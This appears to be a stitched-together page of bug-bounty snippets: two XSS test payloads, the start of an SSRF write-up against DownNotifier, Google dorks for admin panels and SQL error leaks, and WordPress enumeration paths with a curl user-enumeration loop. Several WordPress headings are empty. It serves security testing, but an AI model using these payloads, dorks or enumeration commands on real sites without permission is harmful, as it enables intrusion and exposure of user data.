Best XSS Vectors

Here’s a small #XSS list for manual testing (main cases, high success rate).

 "><img src onerror=alert(1)> 
"autofocus onfocus=alert(1)//

Try it on: – URL query, fragment & path; – all input fields.

From BruteLogic Twitter account :

SSRF | Reading Local Files from DownNotifier server

Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago.

DownNotifier is an online tool to monitor a website
downtime. This tool sends an alert to registered email and sms when the website
is down.

DownNotifier has a BBP on Openbugbounty, so I decided to take a look on When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind.

Collection of information | Google Hacking and Dorks basic

Find the login panel
site: inurl: admin | administrator | adm | login | l0gin | wp-login

site: intext: “sql syntax near” or “syntax error has occurred” or “incorrect syntax near” or “unexpected end of SQL command” or “Warning: mysql_connect ()” or “Warning: mysql_query ()” or “Warning: pg_connect ()” or “Warning: mysql_fetch_array ()”

site: intext: “sql syntax near” or
“syntax error has occurred”
“incorrect syntax near”
“unexpected end of SQL command”
“Warning: mysql_connect ()”
“Warning: mysql_query ()”
“Warning: pg_connect ()”
“Warning: mysql_fetch_array ()”
“MySQL Query Failed”

WordPress basic auditing

Wordpress Read me

Wordpress License with wordpress version

Wordpress sample config:

Wordpress installation:

Wordpress upgrade file:

Wordpress setup config:

Wordpress Api usefull paths:
target/wp-json/wp/v2/users – enumerate users
target/wp-json/wp/v2/posts – enumerate posts
target/wp-json – wordpress api

Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o “\” title=\”View all posts by [a-z0-9A-Z-.]|Location:.” | sed ‘s/\// /g’ | cut -f 6 -d ‘ ‘ | grep -v “^$”; done

Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt

Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt